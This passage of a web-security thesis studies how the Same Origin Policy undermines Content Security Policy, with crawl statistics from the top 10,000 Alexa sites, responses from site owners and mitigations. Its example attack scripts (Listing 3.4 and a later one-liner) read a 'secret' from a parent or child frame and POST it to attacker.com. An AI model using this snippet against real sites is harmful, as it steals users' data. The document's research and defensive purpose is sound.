hashes, introduced in CSP level 2 [275], to remote script URLs, especially to tackle the high
prevalence of insecure hosts in current CSP policies. They proposed whitelisting scripts
with nonces and hashes instead of origins, to prevent bypasses due to JSONP and open
redirects. They first introduced strict CSP, and more specifically the ’strict-dynamic’
keyword for easily loading dynamic content. This keyword states that any additional script
loaded by a whitelisted script is considered a trusted script as well. They also provide
guidelines on how to build an effective CSP. Nonces are included in the DOM, and their
security is questionable. Furthermore, the trust propagation enabled by ’strict-dynamic’
only applies to scripts and stylesheets, and is too liberal since it allows any whitelisted script
to further inject any other script without restrictions. To limit this trust propagation,
Calzavara et al. [178] proposed Compositional Content Security Policy (CCSP). In their
proposal, scripts which are included in the application are individually whitelisted in the
CSP of the application, instead of whitelisting their origins. Furthermore, each of them is
assigned an upper bound in the additional content it can further inject in the application.
The upper bound is a CSP specifying which additional content a whitelisted script can
further load. Besides requiring adoption by the CSP specification, CCSP also requires
content providers to declare all the dependencies needed by content that they host. This
helps developers build the upper bounds when including such content in their policies.
CSP and SOP
CSP is a page-specific policy. Jackson and Barth [208] have shown that page-specific
policies can be bypassed by origin-wide policies, though their work predates CSP. In
our work [255], presented in Chapter 3, we demonstrate that this also applies to CSP, by
analyzing the interactions between CSP (a page-specific policy) and the SOP (an origin-wide
policy). The SOP allows same-origin pages to directly access each other’s execution
contexts. When same-origin pages do not set the same CSP restrictions on scripts they
load, then when one page embeds another as an iframe, CSP violations can occur. In these
settings, the deployed CSP becomes ineffective against attacks propagating from same-
origin pages not protected with CSP. To effectively protect a web page against attacks
with a CSP, one then has to ensure that same-origin pages it embeds are also protected
against attacks, otherwise, an attacker can target such pages, and propagate the attack to
CSP-protected pages thanks to the Same Origin Policy. We also extend previous results on
CSP measurements by analyzing the adoption of CSP by site, not only considering front
pages but all the pages in a site. We have been regularly (monthly) collecting statistics
about CSP adoption on the top 10k Alexa sites. Figure 2.1 shows the evolution of CSP
adoption. It is interesting to note a constant growth in CSP adoption among the homepages
of top sites. In April 2016, only 2.1% of them had adopted CSP. A year later, in April
2017, 3.8% of them had CSP deployed. Finally, in April 2018, 7.3% of the top 10k
Alexa sites deployed CSP. This result is very encouraging from a security perspective. Even
though the sites composing the top 10k may change over time, we can say that the owners
of popular websites are more and more aware of CSP.
Figure 2.1 – Evolution of CSP adoption among top 10,000 Alexa Sites between April 2016
and April 2018 - Source [153]
Dependency-Free CSP
CSP has three versions: CSP1 [261], CSP2 [275] and CSP3 [272]. Each version builds
on the previous one, adding new features, modifying the semantics of some, or removing
others. Furthermore, not all browser vendors implement the same version of CSP,
and not all implementations are compliant with the specification.
As an application developer, one has to ensure that a CSP deployed with a page will
successfully protect it against attacks and preserve the functionality of the application,
no matter the browser in which the application executes and the specific implementation
of CSP in that browser. This area has so far received no attention. In Chapter 4, we
fill this gap by formalizing the differences in CSP versions and browser implementations
as CSP directive dependencies. We then propose a set of rewriting rules and a tool for
developers to build dependency-free policies (DF-CSP), whose semantics are independent of
CSP versions and browser implementations. Such policies help protect applications
against attacks while preserving their functionality in all browsers.
Dependency-free policies are also useful for reasoning about CSP policies with the formal
semantics of Calzavara et al. [179], which computes the global meaning of a CSP policy by
combining the meanings of its individual directives. In this formal semantics, the global
semantics of a CSP policy follows from the semantics of the individual directive values. This
is, however, only correct when the CSP has no dependencies, because otherwise the
meaning of individual directives can be altered by other directives.
Finally, we discuss the security implications of the use of ’strict-dynamic’ in policies
[267,272]. In fact, the use of ’strict-dynamic’ in backwards-compatible policies
such as DF-CSP can give attackers different attack power depending on the version of CSP
considered, especially in CSP3, where an attacker could potentially inject arbitrary content
into the application. We show that automatically generating a second policy out of
a policy that makes use of ’strict-dynamic’ successfully ensures that an attacker who
compromises a script allowed by a DF-CSP does not gain more power, irrespective of the
browser in which the application executes. This limits the trust propagation mechanism of
CSP [267] with a global upper bound for all scripts in the page. This differs from the
individual upper bounds proposed by Calzavara et al. [178], with the advantage
of requiring no modification to the current CSP specification.
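As a purely illustrative sketch, and not the exact construction developed in Chapter 4, the server below delivers a 'strict-dynamic' policy together with a second, whitelist-only policy; since browsers enforce every policy they receive, the second policy acts as a global upper bound on what trusted scripts can load. The host cdn.example.com, the nonce value and the Node.js setup are placeholders.

// Minimal Node.js sketch (names and origins are illustrative): two CSP headers
// are sent; browsers enforce both, so scripts loaded transitively under
// 'strict-dynamic' remain bounded by the whitelist of the second policy.
// (A real deployment would generate a fresh nonce per response.)
var http = require("http");

http.createServer(function (req, res) {
  res.setHeader("Content-Type", "text/html");
  res.setHeader("Content-Security-Policy", [
    "script-src 'nonce-r4nd0m' 'strict-dynamic' https://cdn.example.com",
    "script-src 'nonce-r4nd0m' https://cdn.example.com" // global upper bound
  ]);
  res.end("<script nonce='r4nd0m' src='https://cdn.example.com/app.js'></script>");
}).listen(8080);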
CSP limitations: proposals for extending the specification
Previous works have demonstrated the limitations of CSP [177,178,211,267] as a whitelisting
mechanism. Adding an origin to a policy implies that any content from that origin is
trusted. In fact, it is not possible to exclude (blacklist) specific content, even when one
knows that it is potentially malicious. The only solution would be to individually
whitelist all trusted content, excluding the untrusted one. In addition to being impossible
when only specific content is untrusted, partially whitelisting an origin is bypassable
using HTTP redirections [267,272,275]. Moreover, URL parameters are considered safe
by default. Nonetheless, many attacks have been demonstrated in which attackers leverage
URL parameters to bypass CSP [211,267]. Browser extensions are widespread and can
alter the CSP of webpages, introducing vulnerabilities in webpages [200]. The use of
’strict-dynamic’ makes it difficult to assess which content will effectively load in the
page.
Weichselbaum et al. [267] proposed the use of nonces to mitigate CSP bypasses. This
solution, however, has many shortcomings. First, the security of nonces has been questioned
[178,272,275]. They do not mitigate attacks carried out by whitelisted scripts, especially
when those scripts get compromised. Finally, nonces apply only to scripts and stylesheets. The
CSP violation reporting mechanism also fails at reporting all content that effectively
loads in a webpage, because it is inefficient (it requires the deployment of two policies)
and incomplete (it does not report content injected by browser extensions).
In Chapter 5, we propose extending the CSP specification in order to address the
aforementioned issues. To do so, we discuss four extensions to the current CSP specification:
the ability to blacklist content, more fine-grained checks on URL arguments, explicitly
preventing redirections to partially whitelisted origins, and a reporting mechanism for
content that is allowed by a CSP enforced on a webpage. While requiring few changes to
the specification, these extensions mitigate the shortcomings of CSP in its current
state and the attacks that have been demonstrated in the wild. The reporting mechanism
provides an efficient way of collecting useful feedback about the runtime enforcement of
CSP as done by the browser, and can help improve the effectiveness of policies deployed to
protect webpages. Finally, we demonstrate an implementation of the proposed extensions
using service workers.
Chapter 3
Content Security Policy and the Same Origin Policy
Preamble
This chapter describes the interplay between the Content Security Policy (CSP) mechanism
and the Same Origin Policy. In particular, CSP is a page-specific policy, while the SOP
applies to all same-origin pages. We show how CSP may be violated due to the SOP when
a page has a CSP, but other same-origin pages it can directly interact with (say, a parent
page and its same-origin iframes) do not have CSP. This chapter is a replication of the
paper titled "On the Content Security Policy Violations Due to the Same-Origin Policy"
which was published in the proceedings of the 26th International Conference on World
Wide Web (WWW) in 2017.
1 Introduction
In this chapter, we report on a fundamental problem of CSP. CSP [275] defines how to
protect content in an isolated page. However, it does not take into consideration the page’s
context, that is, its embedder or embedded iframes. In particular, CSP is unable to protect
the content of its corresponding page if the page embeds (using the src attribute) an iframe
of the same origin. The CSP policy of a page will not be applied to an embedded iframe.
However, due to SOP, the iframe has complete access to the content of its embedder.
Because same-origin iframes are transparent due to SOP, this opens loopholes for attackers
whenever the CSP policy of an iframe and that of its embedder page are not compatible
(see Figure 3.1).
Figure 3.1 – An XSS attack despite CSP.
We analyzed 1 million pages from the top 10,000 Alexa sites and found that 5.29% of
sites contain some pages with CSPs (as opposed to 2% of home pages in previous stud-
ies [177]). We identified that in 94% of cases, CSP may be violated in the presence of the
document.domain API, and in 23.5% of cases CSP may be violated without any assumptions
(see Table 3.2).
We also identified a divergence among browsers’ implementations of the enforcement of
CSP [275] in sandboxed iframes embedded with srcdoc. This actually reveals an inconsistency
between the CSP specification and the HTML5 sandbox attribute specification for iframes.
We identify and discuss possible solutions from the developer’s point of view, as well as new
security specifications that can help prevent this kind of CSP violation. We have made
the dataset that we used for our results publicly available [42]. We have set up an
automatic crawler that collects the same dataset every month, so as to repeat the experiment
over time. An accompanying technical report with a complete account
of our analyses can be found at [253].
In summary, our contributions are: (i) We describe a new class of vulnerabilities that
lead to CSP violations (Section 1). (ii) We perform a large-scale, in-depth crawl of top
sites, highlighting CSP adoption at the site level as well as at the level of site origins. Using this
dataset, we report on the possibilities of CSP violations due to the interplay between the SOP and CSP in
the wild (Section 3). (iii) We propose guidelines for the design and deployment of CSP
(Section 6). (iv) We reveal an inconsistency between the CSP specification and the HTML5
sandbox attribute specification for iframes. Different browsers choose to follow different
specifications, and we explain how any of these choices can lead to new vulnerabilities
(Section 5).
2 Content Security Policy and SOP
CSP is a page-specific policy. A CSP delivered with a page controls the resources of the
page. However, it does not apply to the resources the page embeds, such as iframes [275]. As such, CSP
does not control the content of an iframe, even if the iframe is from the same origin as the
main page according to SOP. Instead, the content of the iframe is controlled by the CSP
delivered with it, which can be different from the CSP of the main page.
2.1 CSP violations due to SOP
Consider a web application, where the main page A.html and its iframe B.html are located
at http://main.com, and therefore belong to the same origin according to the Same Origin
Policy [125]. A.html, shown in Listing 3.1, contains a script and an iframe from main.com.
The local script secret.js contains sensitive information, given in Listing 3.2. To protect
against XSS, the developer has installed a CSP for the main page A.html, shown in
Listing 3.3.
<html>
<script src="secret.js"></script>
...
<iframe src="B.html"></iframe>
</html>
Listing 3.1 – Source code of http://main.com/A.html.
var secret =" 42 " ;
Listing 3.2 – Source code of secret.js.
default-src 'none'; script-src 'self'; child-src 'self'
Listing 3.3 – CSP of http://main.com/A.html.
This CSP provides an effective protection against XSS: scripts and child frames may only
be loaded from the page’s own origin (’self’), inline scripts are forbidden, and all other
content is blocked by default-src ’none’.
Only the parent page has CSP
According to CSP2 1, only the CSP of the iframe applies to its content, and the CSP of the
including page is completely ignored. In our case, if there is no CSP in B.html, then its
resource loading is not restricted. As a result, an iframe B.html without CSP is potentially
vulnerable to XSS, since any injected code may be executed within B.html with no restrictions.
Assume B.html was exploited by an attacker injecting a script injected.js. Besides
taking control over B.html, this attack now propagates to the including page A.html, as
we show in Figure 3.1. The XSS attack extends to the including parent page because of the
inconsistency between CSP and SOP. When a parent page and an iframe are from the
same origin according to SOP, they share the same privileges and can
access each other’s code and resources.
In our example, injected.js is shown in Listing 3.4.
This script, executed in B.html, retrieves the secret value from its parent page (parent.secret)
and transmits it to an attacker’s server http://attacker.com via XMLHttpRequest 2.
function sendData(obj, url) {
  var req = new XMLHttpRequest();
  req.open('POST', url, true);
  req.send(JSON.stringify(obj));
}
sendData({secret: parent.secret}, 'http://attacker.com/send.php');
Listing 3.4 – Source code of injected.js.
A straightforward solution to this problem is to ensure that the protection mechanism
for the parent page also propagates to the iframes from the same domain. Technically, it
means that the CSP of the iframe should be the same as, or more restrictive than, the CSP
of the parent. In the next example we show that this requirement does not necessarily
prevent possible CSP violations due to SOP.
Only the iframe has CSP
Consider a different web application, where the including parent page A.html does not
have a CSP, while its iframe B.html contains a CSP from Listing 3.3. In this example,
B.html, shown in Listing 3.5, now contains some sensitive information stored in secret.js
(see Listing 3.2).
<html>
...
<script src="secret.js"></script>
</html>
Listing 3.5 – Source code of http://main.com/B.html.
1. https://www.w3.org/TR/CSP2/#which-policy-applies
2. The XMLHttpRequest is not forbidden by the SOP for B.html because an attacker has activated the
Cross-Origin Resource Sharing mechanism [265] on her server http://attacker.com.
Since the including page A.html now has no CSP, it is potentially vulnerable to XSS, and
therefore may have a malicious script injected.js injected into it. The iframe B.html has a restrictive
CSP that effectively contributes to its protection against XSS. Since A.html and B.html are
from the same origin, the malicious injected script can profit from this and steal sensitive
information from B.html. For example, the script may call the sendData function with
the secret information:
sendData({secret: children[0].secret}, 'http://attacker.com/send.php');
Thanks to SOP, the script injected.js fetches the secret from its child iframe B.html
and sends it to http://attacker.com.
CSP violations due to origin relaxation
A page may change its own origin with some limitations. By using the document.domain
API, the script can change its current domain to a superdomain. As a result, a shorter
domain is used for the subsequent origin checks 3.
Consider a slightly modified scenario, where the main page A.html from http://main.com
includes an iframe B.html from its sub-domain http://sub.main.com. Any script in
B.html is able to change the origin to http://main.com by executing the following line:
document.domain =" m ai n .c om " ;
If A.html is willing to communicate with this iframe, it should also execute the above
code so that communication with B.html becomes possible. The content of B.html is
now treated by the web browser as same-origin content with A.html, and therefore any
of the previously described attacks becomes possible.
Categories of CSP violations due to SOP
We distinguish three different cases in which a CSP violation might occur because of SOP:
Only the parent page or the iframe has CSP: a parent page and an iframe page are
from the same origin, but only one of them contains a CSP. The CSP may be violated
due to the unrestricted access of the page without CSP to the content of the page with
CSP. We demonstrated such examples in Section 2.1.
Parent and iframe have different CSPs: a parent page and an iframe page are from
the same origin, but they have different CSPs. Due to SOP, the scripts from one
page can interfere with the content of the other page, thus violating its CSP.
CSP violation due to origin relaxation: a parent page and an iframe page have the
same higher-level domain, port and scheme, but they are not from the same
origin. Either CSP is absent in one of them, or they have different CSPs; in both
cases CSP may be violated because the pages can relax their origin to the higher-level
domain by using the document.domain API, as we have shown in Section 2.1.
3 Empirical study of CSP violations
We performed a large-scale study on the top 10,000 Alexa sites to detect whether CSP
may be violated due to an inconsistency between CSP and SOP. To collect the data, we
3. https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy#Changing_
origin
used CasperJS [238] on top of the PhantomJS headless browser [205]. The User-Agent HTTP
header was set to that of a Google Chrome browser, version 51.
3.1 Methodology
Figure 3.2 – Data Collection and Analysis Process
An overview of our data collection and CSP comparison process is given in Figure 3.2. The
main difference between our data collection process and previous works on CSP measurements
in the wild [177,267] is that we crawled not only the main pages of each site, but also pages
with at least the same TLD+2 component as the site. First, we collected pages accessible
through links of the main page and pointing to the same site. Second, to detect possible
CSP violations due to SOP, we collected all the iframes present on the home pages and
linked pages.
Data collection
Home page crawler For each site in the top 10,000 Alexa list, we crawled the home
page, parsed its source code and extracted three elements:
(1) the CSP of the site’s home page, delivered in the HTTP header as well as in the <meta> HTML
tag; we denote the set of home page CSPs by C;
(2) to extract more pages from the same site, we analyzed the links via the <a
href=...> tag and extracted the URLs pointing to the same site; we denote this list
by L;
(3) we collected the URLs of the iframes present on the home page via the <iframe src=...> tag
and recorded only those belonging to the same site; we denote this set by F_H.
Page crawler We crawled all the URLs from the list of pages L, and for each page we
repeated the extraction of the CSP and relevant iframes, similarly to steps (1) and
(3) of the home page crawler. As a result, we obtained a set of CSPs of linked pages C_L and a
set of iframe URLs F_L extracted from the linked pages in L.
Iframe crawler
For every iframe URL present in the list of home page iframes F_H and in the list of linked
page iframes F_L, we extracted the corresponding CSPs and stored them in two sets: C_F for
home page iframes and C_LF for linked page iframes.
CSP adoption analysis
Since CSP is considered an effective countermeasure for a number of web attacks, program-
mers may use it to mitigate such attacks on the main pages of their sites. However, if CSP
is not installed on some pages of the same site, this can potentially lead to CSP violations
due to the inconsistency with SOP when another page from the same origin is included as
an iframe (see Figure 3.1). In our database, for each site, we recorded its home page and a
number of linked pages and iframes from the same site. This allowed us to analyze how
CSP is adopted on every popular site by checking the presence of CSP on every crawled
page and iframe of each site. To do so, we analyzed the extracted CSPs: C for the home
page, C_L for linked pages, C_F for home page iframes, and C_LF for linked page iframes.
CSP violations detection
To detect possible CSP violations due to SOP, we analyzed home pages and linked pages
from the same site, as well as iframes embedded into them.
CSP selection
To detect CSP violations, we first removed all the sites where neither a parent page nor an iframe
page contained a CSP. For the remaining sites, we pointwise compared (1) the CSPs of the
home pages C with the CSPs of the iframes present on these pages C_F; and (2) the CSPs of the linked
pages C_L with the CSPs of their iframes C_LF. To check whether a parent page CSP and an
iframe CSP are equivalent, we applied the CSP comparison algorithm (Figure 3.2).
CSP preprocessing We first normalized each CSP by splitting it into its directives.
— If the default-src directive was present (default-src is a fallback for most of the other
directives), we extracted its source list s. We determined which directives
were missing in the CSP, and explicitly added them with the source list s.
— If the default-src directive was missing, we computed the list of directives not present
in the CSP. In this case, the CSP places no restrictions on every absent directive.
We therefore explicitly added them with the most permissive source list. A missing
script-src is assigned * ’unsafe-inline’ ’unsafe-eval’ as the most permissive source
list [275].
— In each source list, we rewrote the special keywords: (i) ’self’ was replaced with
the origin of the page containing the CSP; (ii) when both ’unsafe-inline’ and
hashes or nonces were in the source list, we removed ’unsafe-inline’ from the directive
since it is ignored by CSP2 [275]; (iii) ’none’ keywords were removed from
all the directives; (iv) nonces and hashes were removed from all the directives since
they cannot be compared; (v) each whitelisted domain was extended with the
schemes and port numbers derived from the URL of the page where the CSP was deployed 4.
CSP comparison We compared all the directives present in the two CSPs to identify
whether the two policies imposed the same restrictions. Whenever the two CSPs were different,
our algorithm returned the names of the directives that did not match. A demonstration
of the comparison is accessible at [42]. For each directive in the policies, we compared the
source lists, and the algorithm proceeded only if the elements of the lists were identical in the
normalized CSPs. A simplified sketch of the normalization step is shown below.
Limitations
Our methodology and results have two limitations, which we explain here.
4. For example, according to CSP2, if the page scheme is https, and a CSP contains a source
example.com, then the user agent should allow content only from https://example.com, while if the
current scheme is http, it would allow both http://example.com and https://example.com.
Sites successfully crawled                                            9,885
Pages visited                                                     1,090,226
Pages with iframe(s) from the same site                             648,324
Pages with same-origin iframe(s)                                     92,430
Pages with same-origin iframe(s) where page and/or iframe has CSP       692
Pages with CSP                                               21,961 (2.00%)
Sites with CSP on home page                                      228 (2.3%)
Sites with CSP on some pages                                    523 (5.29%)
Table 3.1 – Crawling statistics
User interactions The automatic crawling process did not include any real-user-like
interactions with the top sites. As such, the set of iframe and link URLs we analyzed is an
underestimate of all the links and iframes a site may contain.
Pairs of (parent, iframe) In this work, we considered CSP violations in same-origin (parent,
iframe) couples only. There are further combinations, such as couples of sibling iframes
in a parent page, that we could have considered. Overall, our results are conservative, since
the problem might have been worse without these limitations.
3.2 Results on CSP adoption
The crawling of the Alexa top 10,000 sites was performed at the end of August 2016. To extract
several pages from the same site, we also crawled all the links and iframes on a page that
pointed to the same site. In total, we gathered 1,090,226 pages from 9,885 different sites.
The median number of pages extracted per site was 45, with a maximum of 9,055 pages
found on tuberel.com. Our crawling statistics are presented in Table 3.1. More than half of
the pages contained an iframe, and 13% of pages contained an iframe from the same site.
This indicates the potential surface for CSP violations when at least one page on the
site has a CSP installed. We discuss such potential CSP violations in detail in Section 3.3.
Similarly to previous works on CSP adoption [177,267], we found that CSP was present
on only 228 out of 9,885 home pages (2.31%). Extending this analysis to almost a million
pages, we found a similar rate of CSP adoption (2.00%).
Figure 3.3 – Percentage of pages with CSP per site
Unlike previous studies that analyzed only home pages, or pages in isolation, we analyzed
how many sites have at least some pages that adopted CSP. We grouped
                                           Same-origin      Possible to      Total
                                           parent-iframe    relax origin
Only parent page has CSP                   83               1,388            1,471
Only iframe has CSP                        16               240              256
Different CSPs in parent page and iframe   70               44               114
No CSP violations                          551              109              660
CSP violations total                       169 (23.5%)      1,672 (94%)      1,841
Table 3.2 – Statistics of CSP violations due to the Same-Origin Policy
                       Same-origin parent-iframe    Possible to relax origin
Only parent page CSP   yandex.ru                    twitter.com, yandex.ru, mail.ru
Only iframe CSP        amazon.com, imdb.com         –*
Different CSP          twitter.com                  –*
*Not found in top 100 Alexa sites.
Table 3.3 – Sample of sites with CSP violations due to the Same-Origin Policy
all pages by site, and found that 5.29% of sites contain some pages with CSPs. This means
that website developers are aware of CSP, which for some reason is not widely adopted on all
the pages of a site.
We then analyzed how many pages on each site have adopted CSP. For each of the 523
sites, we counted how many pages (including the home page, linked pages and iframes) have
CSPs. Figure 3.3 shows that more than half of the sites had a very low CSP adoption
on their pages: on 276 sites out of 529, CSP is installed on only 0-10% of their pages.
This becomes problematic if the other pages without CSP are not XSS-free. However, it is
interesting to note that around a quarter of the sites do profit from CSP by installing it on
90-100% of their pages.
3.3 Results on CSP violations due to SOP
As described in Section 2.1, we distinguish several categories of CSP violations when a
parent page and an iframe on this page are from the same origin according to SOP. To
account for possible CSP violations, we only considered cases where either the parent, the iframe,
or both have a CSP installed. From the 21,961 pages that have CSP installed, we
removed the pages whose CSPs are in report-only mode, leaving 18,035 pages with CSPs
in enforcement mode.
Table 3.2 presents the possible CSP violations due to SOP.
We extracted the parent-iframe couples that might cause a CSP violation either because
(1) only the parent or the iframe installed a CSP, or (2) both installed different CSPs.
First, to account for direct violations because of SOP, we distinguished couples where
parent and iframe were from the same origin (column 2); we found 720 such
couples. Second, we analyzed possible CSP violations due to origin relaxation: we
collected 1,781 couples that are from different origins but whose origins could be relaxed via
the document.domain API (see Section 2.1); these results are shown in column 3.
In Table 3.3 we present the names of the domains out of the top 100 Alexa sites, where
we found different CSP violations. Each company in this table has been notified about the
possible CSP violations. Concrete examples of the page and iframe URLs and their corre-
sponding CSPs for such violations can be found in the corresponding technical report [253].
All the collected data is available online [42].
CSP violations in presence of document.domain According to our results, in the presence of
document.domain, 94% of (parent, iframe) pages can have their CSP violated. These
violations can occur only if both the parent and the iframe pages set document.domain
to the same top-level domain. Thus, our result is an over-approximation, assuming
that document.domain is used in all of those pages and iframes. According to [27],
document.domain is used in less than 3% of web pages.
Only the parent page or the iframe has CSP
We first considered a scenario where a parent page and an iframe are from the same origin,
but only one of them contains a CSP. Intuitively, if only the parent page has a CSP, then
an iframe can violate that CSP by executing any code and accessing the parent page’s DOM,
inserting content, accessing cookies, etc. Among the 720 parent-iframe couples from the same
origin, we found 83 cases (11.5%) where only the parent had a CSP, and 16 cases (2.2%)
where only the iframe had a CSP. These CSP violations originated from 13 (for parents)
and 4 (for iframes) sites. For example, such possible violations are found on some pages
of amazon.com, yandex.ru and imdb.com (see Table 3.3). The CSP of a parent or an iframe may
also be violated because of origin relaxation. We identified 1,388 cases (78%) of parent-iframe
couples where such a violation may occur because CSP is present only in the parent
page. This was observed on 20 different sites, including twitter.com, yandex.ru and others.
Finally, in 240 cases (13.5%) only the iframe had CSP installed, which was found on 11
different sites. We manually checked the parents and iframes involved in CSP violations
for the sites in Table 3.3. In all of those sites, either the parent or the iframe page was a
login page [42]. We further checked how effective the CSPs of those pages were, using
CSP Evaluator 5, proposed by Weichselbaum et al. [267]. We found that the CSPs
involved in these pages are all bypassable.
Parent and iframe have different CSPs
In the case where a page and an iframe are from the same origin but their corresponding CSPs
are different, a CSP violation may also occur. From the 720 same-origin parent-iframe
couples, we found 70 cases (9.7%) (from 3 sites) where their CSPs differed, and for
the origin relaxation case we identified only 44 such cases (2.5%), from 6 sites. This
setting was found on some pages of twitter.com, for instance.
We further analyzed the differences between the CSPs found on parent and iframe pages. For all the
114 pairs of parent-iframe (either same-origin or with possible origin relaxation), we compared
the policies they installed, directive by directive. Figure 3.4 shows that every parent CSP
and iframe CSP differed on almost every directive – between 90% and 100%. The only
exception is the frame-ancestors directive, which is almost the same in the different parent pages
and iframes. If properly set, this directive gives a strong protection against clickjacking
attacks [244], thereby equally protecting all the pages from the same origin.
Potential CSP violations
A potential CSP violation may happen in a site where some pages have CSP and
some others do not, or where pages have different CSPs. When those pages get nested as parent-iframe,
we can run into CSP violations, just like in the direct CSP violation cases we
5. https://csp-evaluator.withgoogle.com/
Figure 3.4 – Differences in CSP directives for parent and iframe pages
                                                            Pages           Origins     Sites
A same-origin page has no CSP                               4,381           197         197
A same-origin page has a different CSP                      1,223           23          23
Total potential violations due to same-origin pages         5,604 (31.1%)   -           -
A same-origin (after relaxation) page has no CSP            4,728           340         183
A same-origin (after relaxation) page has a different CSP   2,567           135         44
Total potential violations due to same-origin pages
(after relaxation)                                          7,295 (40.4%)   -           -
Potential violations total                                  12,899 (72%)    591 (81%)   379 (52%)
Table 3.4 – Potential CSP violations in pages with CSP
reported above. To assess how often such violations may occur, we analyzed the 18,035
pages that had CSP in enforcement mode. These pages originated from 729 different
origins spread over 442 sites. Table 3.4 shows that 72% of CSPs (12,899 pages) could
potentially be violated, and that these CSPs originated from pages of 379 different sites (85.75%).
To detect these violations, for each page with a CSP in our database, we checked whether
there existed another page from the same origin that did not have a CSP. The page without
a CSP could embed the page with CSP, leading to CSP violations because of SOP. We
detected 4,381 such pages (24%) from 197 origins. Similarly, we detected 1,223 same-origin
pages (7%) with different CSPs. We also analyzed cases where potential CSP violations
may happen due to origin relaxation. We detected 4,728 pages (26%) whose CSP may be
violated because of other pages with no CSP, and 2,567 pages (14%) whose CSP may be
violated because of different CSPs on other relaxable-origin pages.
For the pages that have different CSPs, we compared how much their CSPs differed. Figure
3.5 shows that CSPs mostly differed in the script-src directive, which protects pages
from XSS attacks [41]. This means that if one page in the origin whitelists an attacker’s
domain or an insecure endpoint [267], all the other pages in the same origin become
vulnerable, because they may be inserted as iframes into the vulnerable page and their CSPs
could then easily be violated.
Figure 3.5 – Differences in CSP directives for same-origin and relaxed origin pages
3.4 Responses of website owners
We reported these issues to a sample of site owners, using either HackerOne 6 or contact
forms when available. Here are some selected quotes from our discussions with them.
“Yes, of course we understand the risk that under some circumstances XSS
on one domain can be used to bypass CSP on another domain, but it’s simply
impossible to implement CSP across all (few hundreds) domains at once on the
same level. We are implementing strongest CSP currently possible for different
pages on different domains and keep going with this process to protect all pages,
after that we will strengthen the CSP. We believe it’s better to have stronger
CSP policy where possible rather than have same weak CSP on all pages or
not having CSP at all. Having in mind there are hundreds of domains within
mail.ru, at least few years are required before all pages on all domains can have
strong CSP.” – Mail.ru
“[...] the sandbox is a defense in depth mitigation [...]. We definitely don’t allow
relaxing document.domain on www.dropbox.com [...]” – Dropbox.com
“While this is an interesting area of research, are you able to demonstrate that
this behavior is currently exploitable on Twitter? It appears that the behavior
you have described can increase the severity of other vulnerabilities but does not
pose a security risk by itself. Is our understanding correct? [...] We consider this
to be more of a defensive in depth and will take into account with our continual
effort to improve our CSP policy” – Twitter.com
“I believe we understand the risk as you’ve described it.” – Imdb.com
4 Avoiding CSP violations
Preventing CSP violations due to SOP can be achieved by having the same effective CSP
for all same-origin pages of a site, and by preventing origin relaxation.
Origin-wide CSP: Applying a CSP to all same-origin pages can be done manually, but this
solution is error-prone. A more effective solution is the use of a specification such as Origin
Policy [274] in order to set a header for the whole origin.
6. https://hackerone.com
Preventing origin relaxation: Having an origin-wide CSP is not enough to prevent
CSP violations. By using origin relaxation, pages from different origins can bypass the
SOP [248]. Many authors provide guidelines on how to design an effective CSP [267].
Nonetheless, even with an effective CSP, an embedded page from a different origin on the
same site can use document.domain to relax its origin. Preventing origin relaxation is
therefore trickier.
Programmatically, one could prevent other scripts from modifying document.domain by
making a script run first in the page [262]. The first script that runs on the page would be:
Object.defineProperty(document, "domain", {__proto__: null, writable: false, configurable: false});
A parent page can also indirectly disable origin relaxation in iframes by sandboxing them.
This can be achieved by using sandbox as an attribute for iframes or as a directive of the
parent page’s CSP. Unfortunately, an iframe cannot indirectly disable origin relaxation in
the page that embeds it. However, the frame-ancestors directive of CSP gives an iframe
control over the hosts that can embed it. Finally, a more robust solution is the use of a
policy to deprecate document.domain, as proposed in the draft of Feature Policy [276]. Feature
Policy defines a mechanism that allows developers to selectively enable and disable
the use of various browser features and APIs.
Iframe sandboxing: Combining allow-scripts and allow-same-origin as values
for sandbox successfully disables document.domain in an iframe 7. We recommend
the use of sandbox as a CSP directive, instead of as an HTML iframe attribute. The first
reason is that sandbox as a CSP directive automatically applies to all iframes in
a page, avoiding the need to manually modify all HTML iframe tags. Second, the sandbox
directive is not programmatically accessible to potentially malicious scripts in the page,
as is the case for the sandbox attribute (which can be removed from an iframe programmatically,
by replacing the sandboxed iframe with another identical iframe without the
sandbox attribute).
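The sketch below illustrates why the attribute form is fragile; the selector and the replacement logic are only an example of what a malicious script running in the parent page could do.

// Illustrative sketch: a script running in the parent page recreates a
// sandboxed iframe without its sandbox attribute, effectively unsandboxing it.
var sandboxed = document.querySelector("iframe[sandbox]");
var replacement = document.createElement("iframe");
replacement.src = sandboxed.src;                      // same content as before
// no sandbox attribute is set on the replacement, so it is not sandboxed
sandboxed.parentNode.replaceChild(replacement, sandboxed);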
Limitations An origin-wide CSP (the same CSP for all same-origin pages) can become
very liberal if not all same-origin pages require the same restrictions. In order to
implement the solution we propose, one needs to consider the intended relation between a
parent page and an iframe page in the presence of CSP. In the case where the two pages
should be allowed direct access to each other’s context, then, since same-origin pages can
bypass page-specific security characteristics [208], the solution is to have the same CSP for
both the page and the iframe. However, if direct access to each other’s context is not a
required feature, one can keep different CSPs in the parent and the iframe, or have no CSP at all
in one of the parties, but their contents should be isolated from each other. The solution
here is to use sandboxing. Nonetheless, there are other means (such as postMessage, sketched
below) by which one can securely achieve communication between the pages.
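The following hedged sketch shows such a postMessage exchange between an embedding page and its isolated iframe; the origin http://main.com reuses the running example of this chapter, and the message format is arbitrary.

// In the parent page: send a message to the embedded frame, naming the
// expected origin of the receiver explicitly.
var frame = document.querySelector("iframe");
frame.contentWindow.postMessage({ type: "ping" }, "http://main.com");

// In the iframe: accept messages only from the trusted embedder and reply.
window.addEventListener("message", function (event) {
  if (event.origin !== "http://main.com") return; // ignore untrusted senders
  event.source.postMessage({ type: "pong" }, event.origin);
});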
5 Inconsistent implementations
Combining an origin-wide CSP with the allow-scripts sandbox directive would have been
sufficient to prevent the inconsistencies between CSP and the Same Origin Policy. Unfortunately,
we have discovered that for some browsers this solution is not sufficient. Starting
7. We found out that dropbox.com actually sets the sandbox attribute for all its iframes, and therefore
avoids the possible CSP violations. We have had a very interesting discussion on Hackerone.com with
Devdatta Akhawe, a Security Engineer at Dropbox, who told us more about their security practices regarding
CSP in particular.
from HTML5, major browsers, apart from Internet Explorer, support the new srcdoc
attribute for iframes [203]. Instead of providing a URL whose content will be loaded in an
iframe (using the src attribute), one directly provides the HTML content of the iframe in
the srcdoc attribute. According to CSP2 [275], §5.2, the CSP of a page should apply to
an iframe whose content is supplied in a srcdoc attribute. This is actually the case for all
